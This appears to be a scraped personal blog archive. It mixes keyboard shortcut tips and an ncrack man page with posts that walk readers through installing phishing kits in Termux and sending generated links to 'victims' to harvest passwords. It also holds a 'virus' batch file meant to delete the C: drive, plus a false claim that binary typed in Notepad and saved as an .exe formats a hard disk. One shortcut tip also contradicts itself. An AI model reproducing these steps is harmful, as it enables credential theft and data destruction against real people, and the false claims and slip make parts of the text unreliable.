Sunday, February 6, 2022

8 basic computer tricks to make life easier



 At this point, most of the general public should know how to use a computer in the most basic of situations.  Turn it on.  Open up the internet.  Write a document.   Print something.  If you expect to be somewhat successful or, at the very least, considered a normal functioning human being, computer know-how is simply a must.

However, while it is possible to glide on through to success on computer basics, it probably won’t be all that easy for you.  You’ll struggle.  You’ll waste more time than you should.  And you’ll definitely feel the need to throw one or two computers out the window at some time or another.

So, if you’re adamant about sticking to the basics and you don’t feel the need to make ‘geek’ your second language, then here are a few tricks to make you more efficient in the land of computers.  And if even you do consider yourself to be above the basics or somewhat of a computer aficionado, some of these tips might be new and rather useful for you.

CTRL + BKSP

Holding down the backspace button to delete multiple letters at once is such a waste of time.  If you need to delete one whole word, hold down CTRL and Backspace simultaneously.  To delete multiple words, hold down the CTRL button and continue to tap on the Backspace button until you’ve deleted everything that needs to go away.

ALT + TAB

If you use a laptop, this tip can be rather handy.  When you need to switch to another open window (say you have Word, the internet, and Excel open at the same time), then hold down ALT and TAB.  This will allow you to quickly cycle through to the next open program without having to look to that dreaded touchpad for assistance.

CTRL + W

When you have multiple sites open at once, you can close one at a time by holding down CTRL and W.  This action will cause the tab you are currently on to close and will send you back to the next open tab – no magnifying glass and little ‘X’ button required.

CTRL + L

Again, if you’re not willing to reach for your mouse, this trick is incredibly useful.  Hold down CTRL and L to highlight the address bar.  You can immediately begin typing to go to a new website.

Shake

If you have multiple programs open and you don’t like a lot of background noise, use the cursor to shake your active window.  This will automatically minimize all other open programs, leaving you just with the program you want.

Windows + D

If you need all programs minimized – including the program you’re currently on – then hit Windows and D.  This will bring you back to the desktop.

CTRL + T

When you’re on the internet and you need to open up a new tab, hold down CTRL and T.  This trick will get you there quicker.

Windows + L

This is a great tip for anyone, anywhere to use.  Whenever you leave your computer, hit
CTRL and L to lock it.  Hopefully, you have some sort of passcode protecting your device… if not, shame on you.

Thursday, January 13, 2022

ncrack - Network authentication cracking tool

NAME

       ncrack - Network authentication cracking tool




SYNOPSIS

       ncrack [Options] {target specification}


DESCRIPTION

       Ncrack is an open source tool for network authentication

       cracking. It was designed for high-speed parallel cracking

       using a dynamic engine that can adapt to different network

       situations. Ncrack can also be extensively fine-tuned for

       special cases, though the default parameters are generic

       enough to cover almost every situation. It is built on a

       modular architecture that allows for easy extension to

       support additional protocols. Ncrack is designed for

       companies and security professionals to audit large networks

       for default or weak passwords in a rapid and reliable way.

       It can also be used to conduct fairly sophisticated and

       intensive brute force attacks against individual services.

Warning

           Ncrack is a project started in the Summer of 2009. While

           it is already useful for some purposes, it is still

           unfinished, beta quality software. You can help out by

           testing it and reporting any problems as described in

           the section called “BUGS”.


       The output from Ncrack is a list of found credentials, if

       any, for each of the targets specified. Ncrack can also

       print an interactive status report of progress so far and

       possibly additional debugging information that can help

       track problems, if the user selected that option.


       A typical Ncrack scan is shown in Example 1. The only Ncrack

       arguments used in this example are the two target IP

       addresses along with the the corresponding ports for each of

       them. The two example ports 21 and 22 are automatically

       resolved to the default services listening on them: ftp and

       ssh.

Example 1. A representative Ncrack scan

           $ ncrack 10.0.0.130:21 192.168.1.2:22

           Starting Ncrack 0.6 ( http://ncrack.org ) at 2016-01-03 22:10 EEST

           Discovered credentials for ftp on 10.0.0.130 21/tcp:
           10.0.0.130 21/tcp ftp: admin hello1
           Discovered credentials for ssh on 192.168.1.2 22/tcp:
           192.168.1.2 22/tcp ssh: guest 12345
           192.168.1.2 22/tcp ssh: admin money$

           Ncrack done: 2 services scanned in 156.03 seconds.

           Ncrack finished.
The latest version of Ncrack can be obtained from
       http://nmap.org/ncrack. The latest version of this man page
       is available at http://nmap.org/ncrack/man.html .

Sunday, December 5, 2021

How to use Weeman tool in Termux

How to use Weeman tool in Termux



Weeman is advanced phishing tool available for termux.

Installation:

$ apt update && upgrade

$ apt install git

$ apt install python2

$ git clone https://github.com/evait-security/weeman

$ cd weeman

$ chmod +x *

Usages:

$ python2 weeman.py

$ set url http://target.com

$ set action_url http://target.com

$ run

 It will provide cradential harvesting platform.

 

How to use BlackEye tool in Termux

 How to use BlackEye tool in Termux



This is one of the most complete Phishing tool in termux.

Installation:

$ apt update && upgrade

$ apt install git

$ apt install curl

$ git clone https://github.com/An0nUD4Y/blackeye

$ cd blackeye

$ chmod +x *

 Run:-

 $ bash blackeye.sh

Now, Select your desired option for phishing.

How to use SocialFish tool in Termux

 How to use SocialFish tool in Termux




SocialFish is a ultimate phishing tool for 

 Twitter, StackOverFlow, Wordpress, github, google, facebook and so on

Installation:

$ apt update && upgrade

$ apt install git

$ apt install python2

$ git clone https://github.com/UndeadSec/SocialFish.git 

$ cd SocialFish

$ chmod +x *

$ pip2 install -r requirements.txt

Usage:-

Now Select Target and it will generate an URL using Ngrok. Then send this link to victim and wait for cradentials(Username & Password)

How to use shellphish tool in Termux

 How to use shellphish tool in Termux



Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest

Installation :

$ apt update && apt upgrade

$ apt install git

$ git clone https://github.com/suljot/shellphish

$ cd shellphish

Run :

$ bash shellphish.sh

> select your option. It will generates phishing url ..Now send this url to victem for phishing

How to use Hidden Eye tool in Termux

 How to use Hidden Eye tool in Termux



Hidden Eye is a tool that contain a variety of online attacking tools such as Phishing, Keylogger, Information gathering, etc. Hidden Eye used to perform plenty of online attacks on user accounts. By using Hidden Eye you can have your target live information such as IP ADDRESS, Geolocation, ISP, Country, & many more.

Installation:

$ apt-update && apt upgrade -y

$ pkg install git python php curl openssh grep

$ git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

$ chmod +x  HiddenEye

$ pip install requests

$ cd HiddenEye

$ python HiddenEye.py(if not work)

$ ./HiddenEye.py

How to use NexPhisher tool in Termux

 How to use NexPhisher tool in Termux



NexPhisher is an automated Phishing tool made for Termux & Linux .The phishing Pages are Taken from Zphisher under GNU General Public License v3.0 . This tool has 37 Phishing Page Templates of 30 Websites.There are 5 Port Forwarding Options including Localhost !!

Installation: 

$ apt update

$ apt install git -y

$ git clone https://github.com/htr-tech/nexphisher

$ cd nexphisher

$ bash setup

 Run: 

$ bash nexphisher




How to use Zphisher tool in Termux

 How to use Zphisher tool in Termux



Zphisher is upgraded version of shellphish.

Installation: 

 $ apt update

$ apt install git php openssh curl -y

$ git clone https://github.com/htr-tech/zphisher

$ cd zphisher

$ chmod +x zphisher.sh

Run: 

$ bash zphisher.sh

Wednesday, January 30, 2019

Write Simple Undetectable Virus

Write Simple Undetectable Virus



Open Notepad and type:
@echo off
Del C: *.*ly

And save that file as bomb.bat in your Computer.

Note:
Do not run this file in your computer
because this file delete your entire system C:Drive.

Format your Whole Hard Disk From type Code in Notepad

Format your Whole Hard Disk From type Code in Notepad





Open Notepad,
and type the below the code in your Computer:

0110011001101111011100100
1101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

Save the file as "Format.exe"

and, Open the file.
Your Hard Disk will be formatted !

8 basic computer tricks to make life easier

  At this point, most of the general public should know how to use a computer in the most basic of situations.  Turn it on.  Open up the int...